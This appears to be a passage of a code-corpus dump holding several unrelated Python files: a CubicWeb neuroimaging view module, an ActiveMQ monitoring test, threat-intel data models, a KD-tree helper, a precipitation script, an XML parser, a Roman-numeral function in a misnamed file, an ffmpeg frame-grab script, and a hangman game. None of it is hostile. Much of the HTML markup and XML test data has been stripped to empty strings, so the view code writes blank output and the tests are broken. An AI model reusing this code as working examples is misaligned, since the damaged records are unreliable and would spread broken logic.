main()\n","sub_path":"locate_lane_and_cars.py","file_name":"locate_lane_and_cars.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"375906972","text":"##########################################################################\n# NSAp - Copyright (C) CEA, 2013\n# 
Distributed under the terms of the CeCILL-B license, as published by\n# the CEA-CNRS-INRIA. Refer to the LICENSE file or to\n# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html\n# for details.\n##########################################################################\n\n# Cubicweb import\nfrom cubicweb.predicates import is_instance\nfrom cubicweb.view import EntityView\n\n# Brainomics import\nfrom cubes.brainomics.views.outofcontext import ScanOutOfContextView\nfrom cubes.brainomics.views.outofcontext import AssessmentOutOfContextView\nfrom cubes.brainomics.views.outofcontext import QuestionnaireRunOutOfContextView\nfrom cubes.brainomics.views.outofcontext import SubjectOutOfContextView\n\n# PIWS import\nfrom components import AUTHORIZED_IMAGE_EXT\n\n\n###############################################################################\n# Base\n###############################################################################\n\nclass BaseOutOfContextView(EntityView):\n __regid__ = \"outofcontext\"\n __select__ = False\n\n def entity_description(self, entity):\n \"\"\" Generate a dictionary with the entity description.\n \"\"\"\n return {}\n\n def cell_call(self, row, col):\n \"\"\" Create the out of context view template\n \"\"\"\n # Get the entity\n entity = self.cw_rset.get_entity(row, col)\n\n # Get the associated images\n imagefiles = []\n if entity.cw_etype == 'Scan':\n if hasattr(entity, \"results_files\"):\n # TODO: deal with 4d images\n if entity.label not in [\"EPI\", \"DTI\"]:\n for efentries in entity.results_files:\n imagefiles.extend(\n [e.filepath for e in efentries.file_entries\n if e.filepath.endswith(tuple(AUTHORIZED_IMAGE_EXT))])\n\n # Create a viewer if some images has been detected\n limagefiles = len(imagefiles)\n if limagefiles > 0:\n href = self._cw.build_url(\n \"view\", vid=\"brainbrowser-image-viewer\", imagefiles=imagefiles,\n __message=(u\"Found {0} image(s) that can be \"\n \"displayed.\".format(limagefiles)))\n\n # Get the associated documentation if available\n if hasattr(entity, \"label\"):\n tooltip_name = entity.label\n tooltip = self._cw.vreg.docmap.get(entity.label, None)\n else:\n tooltip = None\n\n # Get the subjects/study/center related entities\n if hasattr(entity, \"subjects\"):\n nbsubjects = len(entity.subjects)\n elif entity.__class__.__name__ == \"Subject\":\n nbsubjects = 1\n else:\n nbsubjects = \"nc\"\n study = entity.study[0]\n\n # Get the entity symbol\n image = u\"\".format(\n self._cw.data_url(entity.symbol))\n\n # Create the div that will contain the list item\n self.w(u\"
\")\n\n # Create a bootstrap row item\n self.w(u\"\")\n # > first element: the image\n self.w(u\"{0}\"\n \"\".format(image))\n # > second element: the entity description + link\n self.w(u\"{0}\".format(\n entity.view(\"incontext\")))\n entity_desc = u\"Study {0}\".format(study.name)\n if nbsubjects not in [1, 'nc']:\n entity_desc += u\" - Number of subjects {0}\".format(\n nbsubjects)\n self.w(entity_desc)\n self.w(u\"\")\n # > third element: the see more button\n self.w(u\"\")\n # > fourth element: the show button\n if limagefiles > 0:\n self.w(u\"\".format(href))\n self.w(u\"Show ☇\")\n self.w(u\"\")\n # > fifth element: the doc button\n if tooltip is not None:\n tiphref = self._cw.build_url(\"view\", vid=\"piws-documentation\",\n tooltip_name=tooltip_name,\n _notemplate=True)\n self.w(u\"\")\n self.w(u\"\".format(tiphref))\n self.w(u\"☇\")\n self.w(u\"\")\n\n # Close row item\n self.w(u'')\n\n # Get the entity description\n entity_desc = self.entity_description(entity)\n\n # Create a div that will be show or hide when the see more button is\n # clicked\n self.w(u\"\".format(row))\n self.w(u\"\")\n for key, value in entity_desc.items():\n self.w(u\"{0}{1}\".format(key, value))\n self.w(u\"\")\n\n # Create a div that will be show or hide when the doc button is\n # clicked\n self.w(u\"\".format(row))\n self.w(unicode(tooltip))\n self.w(u\"\")\n\n # Close list item\n self.w(u\"\")\n\n\n###############################################################################\n# Scans\n###############################################################################\n\nclass OutOfContextScanView(BaseOutOfContextView):\n __select__ = EntityView.__select__ & is_instance(\"Scan\")\n\n def entity_description(self, entity):\n \"\"\" Generate a dictionary with the Scan description.\n \"\"\"\n dtype_entity = entity.has_data[0]\n study = entity.study[0]\n desc = {}\n desc[\"Image Shape (x)\"] = dtype_entity.shape_x\n desc[\"Image Shape (y)\"] = dtype_entity.shape_y\n desc[\"Image Shape (z)\"] = dtype_entity.shape_z\n desc[\"Voxel resolution (x)\"] = dtype_entity.voxel_res_x\n desc[\"Voxel resolution (y)\"] = dtype_entity.voxel_res_y\n desc[\"Voxel resolution (z)\"] = dtype_entity.voxel_res_z\n desc[\"Repetition time\"] = dtype_entity.tr\n desc[\"Echo time\"] = dtype_entity.te\n desc[\"Scanner field\"] = dtype_entity.field\n #desc[\"Related subject\"] = subject.view(\"incontext\")\n desc[\"Related study\"] = study.view(\"incontext\")\n return desc\n\n\n###############################################################################\n# Assessment\n###############################################################################\n\nclass OutOfContextAssessmentView(BaseOutOfContextView):\n __select__ = EntityView.__select__ & is_instance(\"Assessment\")\n\n def entity_description(self, entity):\n \"\"\" Generate a dictionary with the Assessment description.\n \"\"\"\n center = entity.center[0]\n subjects = entity.subjects\n run_items = []\n run_items.extend(entity.processing_runs)\n run_items.extend(entity.scans)\n run_items.extend(entity.questionnaire_runs)\n run_items.extend(entity.genomic_measures)\n desc = {}\n desc[\"Acquisition center\"] = center.name\n if len(subjects) == 1:\n subject = subjects[0]\n desc[\"Gender\"] = subject.gender\n desc[\"Handedness\"] = subject.handedness\n desc[\"Age\"] = entity.age_of_subject\n desc[\"Related runs\"] = \" - \".join(\n [x.view(\"incontext\") for x in run_items])\n return desc\n\n\n###############################################################################\n# Subject\n###############################################################################\n\nclass OutOfContextSubjectView(BaseOutOfContextView):\n __select__ = EntityView.__select__ & is_instance(\"Subject\")\n\n def entity_description(self, entity):\n \"\"\" Generate a dictionary with the Subject description.\n \"\"\"\n desc = {}\n desc[\"Gender\"] = entity.gender\n desc[\"Handedness\"] = entity.handedness\n desc[\"Related assessments\"] = \"\".join(\n [\"  • {1}  • \".format(item.absolute_url(), item.identifier)\n for item in entity.assessments])\n href = self._cw.build_url(\n \"view\", vid=\"highcharts-relation-summary-view\",\n rql=\"Any A WHERE S eid '{0}', S assessments A\".format(entity.eid),\n relations=[\"scans\", \"questionnaire_runs\", \"genomic_measures\"],\n subject_attr=\"timepoint\", object_attr=\"label\",\n title=\"Acquisition status: {0}\".format(entity.code_in_study))\n desc[\"Acquisition summary\"] = \"status\".format(href)\n href = self._cw.build_url(\n \"view\", vid=\"highcharts-relation-summary-view\",\n rql=\"Any A WHERE S eid '{0}', S assessments A\".format(entity.eid),\n relations=\"related_processing\", subject_attr=\"timepoint\",\n object_attr=\"tool\", title=\"Processing status: {0}\".format(\n entity.code_in_study))\n desc[\"Processing summary\"] = \"status\".format(href)\n href = self._cw.build_url(\n \"view\", vid=\"questionnaire-longitudinal-measures\",\n rql=(\"Any QR WHERE S eid '{0}', S assessments A, \"\n \"A questionnaire_runs QR\".format(entity.eid)),\n patient_id=entity.code_in_study)\n desc[\"Measure summary\"] = \"status\".format(href)\n return desc\n\n\n###############################################################################\n# ProcessingRun\n###############################################################################\n\nclass OutOfContextProcessingRunView(BaseOutOfContextView):\n __select__ = EntityView.__select__ & is_instance(\"ProcessingRun\")\n\n def entity_description(self, entity):\n \"\"\" Generate a dictionary with the ProcessingRun description.\n \"\"\"\n desc = {}\n desc[\"Name\"] = entity.name\n desc[\"Tool\"] = entity.tool\n desc[\"Parameters\"] = entity.parameters\n desc[\"Note\"] = entity.note\n return desc\n\n\n###############################################################################\n# QuestionnaireRun\n###############################################################################\n\n\nclass OutOfContextQuestionnaireRunView(BaseOutOfContextView):\n __select__ = EntityView.__select__ & is_instance(\"QuestionnaireRun\")\n\n def entity_description(self, entity):\n \"\"\" Generate a dictionary with the QuestionnaireRun description.\n \"\"\"\n questionnaire = entity.instance_of[0]\n desc = {}\n desc[\"Related questionnaire\"] = questionnaire.view(\"incontext\")\n return desc\n\n\n###############################################################################\n# Default\n###############################################################################\n\nclass OutOfContextDefaultView(EntityView):\n __regid__ = \"outofcontext\"\n __select__ = EntityView.__select__ & is_instance(\"CWSearch\", \"CWUpload\")\n\n def cell_call(self, row, col):\n \"\"\" Create the default view line by line.\n \"\"\"\n # Get the processing run entity\n entity = self.cw_rset.get_entity(row, col)\n\n # Create the div that will contain the list item\n self.w(u'    ')\n\n # Create a bootstrap row item\n self.w(u'    ')\n # > add the scan description + link\n self.w(u'    {0}    '.format(\n entity.view(\"incontext\")))\n self.w(u'    ')\n # Close row item\n self.w(u'    ')\n\n # Close list item\n self.w(u'
    ')\n\n\n###############################################################################\n# Register views\n###############################################################################\n\ndef registration_callback(vreg):\n \"\"\" Update outofcontext views.\n \"\"\"\n vreg.register(OutOfContextDefaultView)\n vreg.register(OutOfContextProcessingRunView)\n vreg.register_and_replace(OutOfContextScanView, ScanOutOfContextView)\n vreg.register_and_replace(OutOfContextSubjectView, SubjectOutOfContextView)\n vreg.register_and_replace(\n OutOfContextAssessmentView, AssessmentOutOfContextView)\n vreg.register_and_replace(\n OutOfContextQuestionnaireRunView, QuestionnaireRunOutOfContextView)\n","sub_path":"piws/views/secondary.py","file_name":"secondary.py","file_ext":"py","file_size_in_byte":12922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"595820184","text":"import unittest\n\nimport mock\n\nfrom tests.checks.common import get_check\n\n\nclass ActiveMQXMLTestCase(unittest.TestCase):\n def setUp(self):\n self.config = \"\"\"\ninit_config:\n\ninstances:\n - username: username\n password: password\n url: http://localhost:8161\n\"\"\"\n\n def test_fetch_data(self):\n # not too concerned with the response body, just that requests.get was called\n # with the correct arguments\n check, instances = get_check('activemq_xml', self.config)\n check.requests = mock.Mock()\n check._fetch_data('http://localhost:8171', '/admin/xml/queues.jsp', None, None)\n assert check.requests.get.call_count == 1\n assert check.requests.get.call_args == mock.call(\n 'http://localhost:8171/admin/xml/queues.jsp', auth=None\n )\n\n check.requests.get.reset_mock()\n check._fetch_data('http://localhost:8171', '/admin/xml/queues.jsp', 'user', 'pass')\n assert check.requests.get.call_count == 1\n assert check.requests.get.call_args == mock.call(\n 'http://localhost:8171/admin/xml/queues.jsp', auth=('user', 'pass')\n )\n\n def test_check(self):\n check, instances = get_check('activemq_xml', self.config)\n check.requests = mock.Mock()\n\n def response_side_effect(*args, **kwargs):\n text = ''\n if '/admin/xml/topics.jsp' in args[0]:\n text = ''\n elif '/admin/xml/queues.jsp' in args[0]:\n text = ''\n elif '/admin/xml/subscribers.jsp' in args[0]:\n text = ''\n # if text='' then we will get an xml parsing error\n # (which is what we want if we called with a url we dont know)\n return mock.Mock(text=text)\n\n check.requests.get.side_effect = response_side_effect\n check.check(instances[0])\n expected = {\n 'url:http://localhost:8161': {\n 'activemq.queue.count': (0, 'gauge'),\n 'activemq.topic.count': (0, 'gauge'),\n 'activemq.subscriber.count': (0, 'gauge'),\n }\n }\n self._assert_expected_metrics(expected, check.get_metrics())\n\n def test_process_queue_data_normal(self):\n check, instances = get_check('activemq_xml', self.config)\n\n data = \"\"\"\n \n \n \n \n queueBrowse/Queue1;jsessionid=sess_token?view=rss&feedType=atom_1.0\n queueBrowse/Queue1;jsessionid=sess_token?view=rss&feedType=rss_2.0\n \n \n \n \n \n queueBrowse/Queue2;jsessionid=sess_token?view=rss&feedType=atom_1.0\n queueBrowse/Queue2;jsessionid=sess_token?view=rss&feedType=rss_2.0\n \n \n \n \"\"\"\n check._process_data(data, \"queue\", [], 300, [])\n expected = {\n 'queue:Queue2': {\n 'activemq.queue.size': ('10', 'gauge'),\n 'activemq.queue.enqueue_count': ('1165', 'gauge'),\n 'activemq.queue.dequeue_count': ('1165', 'gauge'),\n 'activemq.queue.consumer_count': ('3', 'gauge')\n },\n '': {\n 
'activemq.queue.count': (2, 'gauge')\n },\n 'queue:Queue1': {\n 'activemq.queue.dequeue_count': ('64714', 'gauge'),\n 'activemq.queue.consumer_count': ('6', 'gauge'),\n 'activemq.queue.size': ('0', 'gauge'),\n 'activemq.queue.enqueue_count': ('64714', 'gauge'),\n },\n }\n\n self._assert_expected_metrics(expected, check.get_metrics())\n\n def test_process_queue_data_no_data(self):\n check, instances = get_check('activemq_xml', self.config)\n\n data = \"\"\"\n \n \n \"\"\"\n check._process_data(data, \"queue\", [], 300, [])\n expected = {\n '': {\n 'activemq.queue.count': (0, 'gauge')\n },\n }\n\n self._assert_expected_metrics(expected, check.get_metrics())\n\n def test_process_topics_data_normal(self):\n check, instances = get_check('activemq_xml', self.config)\n\n data = \"\"\"\n \n \n \n \n \n \n \n \n \"\"\"\n\n check._process_data(data, \"topic\", [], 300, [])\n expected = {\n 'topic:Topic1': {\n 'activemq.topic.size': ('5', 'gauge'),\n 'activemq.topic.enqueue_count': ('24', 'gauge'),\n 'activemq.topic.dequeue_count': ('0', 'gauge'),\n 'activemq.topic.consumer_count': ('0', 'gauge')\n },\n '': {\n 'activemq.topic.count': (2, 'gauge')\n },\n 'topic:Topic2': {\n 'activemq.topic.dequeue_count': ('1200', 'gauge'),\n 'activemq.topic.consumer_count': ('50', 'gauge'),\n 'activemq.topic.size': ('1', 'gauge'),\n 'activemq.topic.enqueue_count': ('12', 'gauge'),\n },\n }\n\n self._assert_expected_metrics(expected, check.get_metrics())\n\n def test_process_topic_data_no_data(self):\n check, instances = get_check('activemq_xml', self.config)\n\n data = \"\"\"\n \n \n \"\"\"\n check._process_data(data, \"topic\", [], 300, [])\n expected = {\n '': {\n 'activemq.topic.count': (0, 'gauge')\n },\n }\n\n self._assert_expected_metrics(expected, check.get_metrics())\n\n def test_process_subscriber_data_normal(self):\n check, instances = get_check('activemq_xml', self.config)\n\n data = \"\"\"\n \n \n \n \n \n \n \n \n \"\"\"\n check._process_subscriber_data(data, [], 300, [])\n expected = {\n 'active:yes-clientId:10-connectionId:10-destinationName:Queue1-selector:*-subscriptionName:subscription1': {\n 'activemq.subscriber.enqueue_counter': ('235', 'gauge'),\n 'activemq.subscriber.dequeue_counter': ('175', 'gauge'),\n 'activemq.subscriber.dispatched_counter': ('15', 'gauge'),\n 'activemq.subscriber.dispatched_queue_size': ('15', 'gauge'),\n 'activemq.subscriber.pending_queue_size': ('5', 'gauge'),\n },\n '': {\n 'activemq.subscriber.count': (2, 'gauge'),\n },\n 'active:no-clientId:5-connectionId:15-destinationName:Topic1-selector:*-subscriptionName:subscription2': {\n 'activemq.subscriber.enqueue_counter': ('12', 'gauge'),\n 'activemq.subscriber.dequeue_counter': ('15', 'gauge'),\n 'activemq.subscriber.dispatched_counter': ('5', 'gauge'),\n 'activemq.subscriber.dispatched_queue_size': ('0', 'gauge'),\n 'activemq.subscriber.pending_queue_size': ('0', 'gauge'),\n },\n }\n\n self._assert_expected_metrics(expected, check.get_metrics())\n\n def test_process_subscriber_data_no_data(self):\n check, instances = get_check('activemq_xml', self.config)\n\n data = \"\"\"\n \n \n \"\"\"\n check._process_subscriber_data(data, [], 300, [])\n expected = {\n '': {\n 'activemq.subscriber.count': (0, 'gauge')\n },\n }\n\n self._assert_expected_metrics(expected, check.get_metrics())\n\n def _iter_metrics(self, metrics):\n for name, _, value, data in metrics:\n tags = sorted(data.get('tags', []))\n tags = '-'.join(tags)\n yield tags, name, value, data['type']\n\n def _assert_expected_metrics(self, expected, metrics):\n count = 
sum(len(r.keys()) for r in expected.values())\n self.assertEqual(count, len(metrics), (count, metrics))\n\n for tags, key, value, el_type in self._iter_metrics(metrics):\n self.assertEquals(expected.get(tags, {}).get(key), (value, el_type), (tags, key, metrics))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/checks/mock/test_activemq_xml.py","file_name":"test_activemq_xml.py","file_ext":"py","file_size_in_byte":9872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"602304677","text":"from datetime import datetime\nfrom .base import AutoFocusObject\n\n\nclass Whois(AutoFocusObject):\n def __init__(self, kwargs):\n\n #: str: country information\n self.admin_country = kwargs.get(\"whoisAdminCountry\")\n\n #: str: admin email\n self.admin_email = kwargs.get(\"whoisAdminEmail\")\n\n # str: name of admin\n self.admin_name = kwargs.get(\"whoisAdminName\")\n created = kwargs.get(\"whoisDomainCreationDate\")\n\n #: datetime: when domain was created\n self.domain_creation_date = datetime.strptime(created, \"%Y-%m-%d\") if created else None\n expiration = kwargs.get(\"whoisDomainExpireDate\")\n\n #: datetime: when domain expires\n self.domain_expiration_date = datetime.strptime(expiration, \"%Y-%m-%d\") if expiration else None\n updated = kwargs.get(\"whoisDomainUpdateDate\")\n\n #: datetime: when domain was updated\n self.domain_updated_date = datetime.strptime(updated, \"%Y-%m-%d\") if updated else None\n\n #: str: registrar for domain\n self.registrar = kwargs.get(\"whoisRegistrar\")\n\n #: str: registrar url\n self.registrar_url = kwargs.get(\"whoisRegistrarUrl\")\n\n #: str: registrant\n self.registrant = kwargs.get(\"whoisRegistrant\")\n\n\nclass ThreatIntelCard(AutoFocusObject):\n def __init__(self, kwargs):\n\n _first_seen_ts = kwargs.get(\"firstSeenTsGlobal\")\n #: datetime: when indicator was first seen\n self.first_seen = datetime.fromtimestamp(_first_seen_ts / 1000) if _first_seen_ts else None\n\n _last_seen_ts = kwargs.get(\"lastSeenTsGlobal\")\n #: datetime: when indicator was last seen\n self.last_seen = datetime.fromtimestamp(_last_seen_ts / 1000) if _last_seen_ts else None\n\n #: List[str]: which data sources saw indicator\n self.seen_by = kwargs.get(\"seenByDataSourceIds\")\n\n verdicts = kwargs.get(\"latestPanVerdicts\")\n wildfire_verdict = verdicts.get(\"WF_SAMPLE\")\n pandb_verdict = verdicts.get(\"PAN_DB\")\n\n #: str: verdict in WF if seen by WF\n self.wildfire_verdict = wildfire_verdict.lower() if wildfire_verdict else None\n\n #: str: verdict in PanDB if seen by PanDB\n self.pandb_verdict = pandb_verdict.lower() if pandb_verdict else None\n\n # Whois: whois information if available\n self.whois = Whois(kwargs)\n","sub_path":"autofocus/models/tic.py","file_name":"tic.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"93997032","text":"# -*- coding:utf-8 -*-\n\nfrom scipy import spatial\nimport numpy as np\n\nclass kdtree:\n def __init__(self, data):\n self.tree = spatial.KDTree(data)\n self.data = self.tree.data\n\n def serch(self, point):\n result = self.tree.query(np.array(point))\n return self.data[result[1]].tolist()\n\n\n\nif __name__ == '__main__':\n x, y = np.mgrid[0:5, 2:8]\n test = list(zip(x.ravel(), y.ravel()))\n my_kdtree = kdtree(test)\n point = [0,0]\n result = my_kdtree.serch(point)\n 
print(result)","sub_path":"GA-VFGA/GA-VF/kdtree.py","file_name":"kdtree.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"38348918","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 8 12:41:31 2018\n\n@author: Jitske\n\"\"\"\n\nimport json\n\nwith open('precipitation.json') as file:\n info = json.load(file)\n \n# format stations: Seattle,WA,GHCND:US1WAKG0038\n \n# format data: [{'datatype': 'PRCP', 'date': '2010-01-01', \n# 'station': 'GHCND:USW00093814', 'value': 0}] \n\nstation_info = []\nwith open('stations.csv') as file:\n for line in file:\n line = line.strip('\\n')\n line = line.split(',')\n station_info += [line]\n\nstation1 = []\nstation2 = []\nstation3 = []\nstation4 = []\n\nmonthly_prec1 = 12*[0] \nmonthly_prec2 = 12*[0]\nmonthly_prec3 = 12*[0]\nmonthly_prec4 = 12*[0]\n# Order is: year-month-day\n\n\nmy_dict = {}\nfor entry in range(1,len(station_info)):\n my_dict[station_info[entry][0]] = {\n 'station':station_info[entry][2], \n 'state':station_info[entry][1]}\n\nprint(my_dict)\n\n# For all entries in info, check if it's Seattle and add that to a seperate list\nfor entry in range(len(info)):\n temp = info[entry]['station'] ## select station code\n month = int(info[entry]['date'][5:7]) ## Select the Month, by looking at \n ## every entry, then at the key 'date' and then \n ## taking the month part from the string \n \n if temp == station_info[1][2]:\n station1 += [info[entry]]\n ## At loc month-1 (bc index starts at 0), add the precipitation for that day\n monthly_prec1[month-1]+= info[entry]['value'] \n \n #select all entries for Seattle and make that a list (Seattle,WA,GHCND:US1WAKG0038)\n if temp == station_info[2][2]:\n station2 += [info[entry]]\n monthly_prec2[month-1]+= info[entry]['value'] \n\n if temp == station_info[3][2]:\n station3 += [info[entry]]\n monthly_prec3[month-1]+= info[entry]['value'] \n \n if temp == station_info[4][2]:\n station4 += [info[entry]]\n monthly_prec4[month-1]+= info[entry]['value'] \n\nmy_dict[station_info[1][0]]['totalMonthlyPrecipitation'] = monthly_prec1\nmy_dict[station_info[2][0]]['totalMonthlyPrecipitation'] = monthly_prec2\nmy_dict[station_info[3][0]]['totalMonthlyPrecipitation'] = monthly_prec3 \nmy_dict[station_info[4][0]]['totalMonthlyPrecipitation'] = monthly_prec4\n\nprint(my_dict)\n\n\nmonthly_prec = [monthly_prec1,monthly_prec2,monthly_prec3,monthly_prec4]\n\n\n## Yearly precipitation per city \nyearly_prec = [sum(monthly_prec1),sum(monthly_prec2),sum(monthly_prec3),sum(monthly_prec4)]\ntotal_prec = sum(yearly_prec)\n \nrel_monthly_prec = [12*[0], 12*[0], 12*[0], 12*[0]]\n\nfor i in range(len(monthly_prec)):\n for j in range(len(monthly_prec[i])):\n rel_monthly_prec[i][j] = round(monthly_prec[i][j]/yearly_prec[i], 2)\n\n\n## Calculate relative yearly prec and store in dict \n## Also store other vars in dic\ncount = 0\nfor entry in my_dict:\n my_dict[entry]['relativeMonthlyPrecipitation'] = rel_monthly_prec[count]\n my_dict[entry]['totalYearlyPrecipitation'] = yearly_prec[count]\n my_dict[entry]['relativeYearlyPrecipitation'] = round(yearly_prec[count]/total_prec,2)\n\n count += 1 \n \n\nprint(my_dict)\n\n# Write to a json file \nwith open('results.json', 'w') as file:\n json.dump(my_dict, file, indent=4) \n\n","sub_path":"Koeleman_Ass3_code.py","file_name":"Koeleman_Ass3_code.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} 
+{"seq_id":"273002158","text":"import xml.sax\n\n# declare the variables\nclass PhimHandler(xml.sax.ContentHandler):\n def __init__(self):\n self.CurrentData = \"\"\n self.ho_ten = \"\"\n self.ngay_sinh = \"\"\n self.ma_mon = \"\"\n self.diem = \"\"\n \n # record the tags that have attributes\n # Call when an element starts\n def startElement(self, tag, attributes):\n self.CurrentData = tag\n if tag == \"HOC_SINH\":\n print(\"* \"*30)\n self.ho_ten = attributes[\"Ho_ten\"]\n self.ngay_sinh = attributes[\"Ngay_sinh\"]\n print(\"Ho ten : \",self.ho_ten)\n print(\"Ngay sinh : \",self.ngay_sinh)\n\n elif tag == \"KET_QUA\" :\n self.ma_mon = attributes[\"Ma_mon\"]\n self.diem = attributes[\"Diem\"]\n print(\"Ma mon : \",self.ma_mon)\n print(\"Diem : \",self.diem)\n elif self.CurrentData == \"KET_QUA_THI\" :\n print(\"Ket qua thi\")\n # self.CurrentData = \"\"\n \n # record the tags without attributes\n # Call when an elements ends\n def endElement(self, tag):\n\n self.CurrentData = \"\"\n\n # assign the content text \n # Call when a character is read\n def characters(self, content):\n pass\n \n\nif (__name__ == \"__main__\"):\n # create an XMLReader\n parser = xml.sax.make_parser()\n # override the default ContextHandler\n Handler = PhimHandler()\n parser.setContentHandler(Handler)\n Ten_Tap_tin = \"ket_qua_hoc_tap.xml\"\n parser.parse(Ten_Tap_tin)\n","sub_path":"XML/XML/ket_qua_hoc_tap_SAX_.py","file_name":"ket_qua_hoc_tap_SAX_.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"451898361","text":"\n\"\"\"\nCreate a function that takes a Roman numeral as its argument and returns its value as a numeric decimal integer. You don't need to validate the form of the Roman numeral.\n\nModern Roman numerals are written by expressing each decimal digit of the number to be encoded separately, starting with the leftmost digit and skipping any 0s. So 1990 is rendered \"MCMXC\" (1000 = M, 900 = CM, 90 = XC) and 2008 is rendered \"MMVIII\" (2000 = MM, 8 = VIII). 
The Roman numeral for 1666, \"MDCLXVI\", uses each letter in descending order.\n\nExample:\n\nsolution('XXI') # should return 21\n\nHelp:\n\nSymbol Value\nI 1\nV 5\nX 10\nL 50\nC 100\nD 500\nM 1,000\n\n\"\"\"\n\nsymbols= {\n\"I\" : 1,\n\"V\" : 5,\n\"X\" : 10,\n\"L\" : 50,\n\"C\" : 100,\n\"D\" : 500,\n\"M\" : 1_000}\n\n\ndef solution(roman):\n n = 0\n for i in range(len(roman)-1):\n l = roman[i]\n if symbols[l] >= symbols[roman[i+1]]:\n n += symbols[l]\n else:\n n -= symbols[l]\n return n + symbols[roman[-1]]\n ","sub_path":"6kyu_Counting_Duplicates.py","file_name":"6kyu_Counting_Duplicates.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"85331133","text":"#!/usr/bin/python\nimport os\nimport shutil\nimport sys\nfrom sys import platform\n\nproject=sys.argv[1]\nproject_name=os.path.basename(project)\nreference_frame_dir=project+\"/shared/reference_frames\"\nif platform==\"win32\":\n\tffmpeg=\"C:/CatsFarm/os/windows/ffmpeg/ffmpeg.exe\"\nelse:\n\tffmpeg=\"ffmpeg\"\n#-----------------\nreference_frame=1\n#------------------\nvideo_format=[\"mov\",\"mp4\",\"jpg\",\"tiff\",\"dpx\"]\n#----------------------------------------\n\nif not os.path.isdir(reference_frame_dir):\n\tos.makedirs(reference_frame_dir)\n\nshots=[]\n\nclass stamp():\n\tdef __init__(self):\n\t\t#chekea si el proyecyo tiene secuencias\n\t\tisSec=False\n\t\tfor sec in self.listdir(project):\n\t\t\tsec=sec.split(\"_\")[0]\n\t\t\tif sec ==\"sec\" or sec==\"roll\":\n\t\t\t\tisSec=True\n\t\t#------------------------------------\n\t\tif isSec:\n\t\t\tfor sec in self.listdir(project):\n\t\t\t\tsec_path=project+\"/\"+sec\n\t\t\t\tself.for_shot(sec,sec_path)\n\t\t\tself.make_image()\n\n\t\telse:\n\t\t\tself.for_shot(\"sec_001\",project)\n\t\t\tself.make_image()\n\n\tdef for_shot(self,sec,sec_path):\n\n\n\t\tfor shot in self.listdir(sec_path):\n\t\t\tshot_path=sec_path+\"/\"+shot\n\n\t\t\tcontent=[\"renders\",\"render\",\"footage\",\"assets\"]\n\n\t\t\tfor c in content:\n\t\t\t\tc=shot_path+\"/\"+c\n\t\t\t\tvideo=False\t\n\t\t\t\tfor root, dir, file in os.walk(c):\n\n\t\t\t\t\text=None\n\t\t\t\t\tfor f in file:\n\t\t\t\t\t\tvideo_ok=root+\"/\"+f\n\t\t\t\t\t\text=f.split(\".\")[-1]\n\t\t\t\t\t\tif ext in video_format:\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tif ext in video_format:\n\t\t\t\t\t\tvideo=True\n\t\t\t\t\t\tbreak\n\n\t\t\t\tif video:\n\t\t\t\t\tbreak\n\n\t\t\ttry:shots.append((video_ok,project_name+\"_\"+sec+\"_\"+shot))\n\t\t\texcept:None\n\n\tdef make_image(self):\n\t\tfor shot, name in shots:\n\t\t\tcmd=ffmpeg+' -i \"'+shot+'\" -vframes '+str(reference_frame)+' \"'+reference_frame_dir+\"/\"+name+'.jpg\"'\n\t\t\tos.system(cmd)\n\t\t\tprint (cmd)\n\n\tdef listdir(self,dirs):\n\t\ttry:return os.listdir(dirs)\n\t\texcept: return []\nstamp()","sub_path":"stamp_project.py","file_name":"stamp_project.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"461954247","text":"from random import randint\n#relativo aos desenhos da forca, várias funções, o código está abaixo dos desenhos\ndef erro1():\n print(\"\"\"\n\n|─|─────────────────|\n| | (--)\n| |\n| |\n| |\n| |\n| |\n| |\n|_|______________________\nvocê tem 6 tentativas\n─────────────────────────\n\"\"\")\ndef erro2():\n print(\"\"\"\n\n|─|─────────────────|\n| | (oo)\n| | ||\n| | ||\n| | ||\n| |\n| |\n| |\n|_|______________________\nvocê tem 5 tentativas\n─────────────────────────\n\"\"\")\ndef 
erro3():\n print(\"\"\"\n\n|─|─────────────────|\n| | (oo)\n| | ||_\n| | || \\\\\n| | || \\\\\n| |\n| |\n| |\n|_|______________________\nvocê tem 4 tentativas\n─────────────────────────\n\"\"\")\ndef erro4():\n print(\"\"\"\n\n|─|─────────────────|\n| | (oo)\n| | _||_\n| | / || \\\\\n| | / || \\\\\n| |\n| |\n| |\n|_|______________________\nvocê tem 3 tentativas\n─────────────────────────\n\"\"\")\ndef erro5():\n print(\"\"\"\n\n|─|─────────────────|\n| | (oo)\n| | _||_\n| | / || \\\\\n| | / || \\\\\n| | /\n| | _/\n| |\n|_|______________________\nvocê tem 2 tentativas\n─────────────────────────\n\"\"\")\ndef erro6():\n print(\"\"\"\n\n|─|─────────────────|\n| | (oo)\n| | _||_\n| | / || \\\\\n| | / || \\\\\n| | /\\\\\n| | _/ \\\\_\n| |\n|_|_______________________\nvocê só tem 1 tentativa!!!\n──────────────────────────\n\"\"\")\ndef ganhou():\n 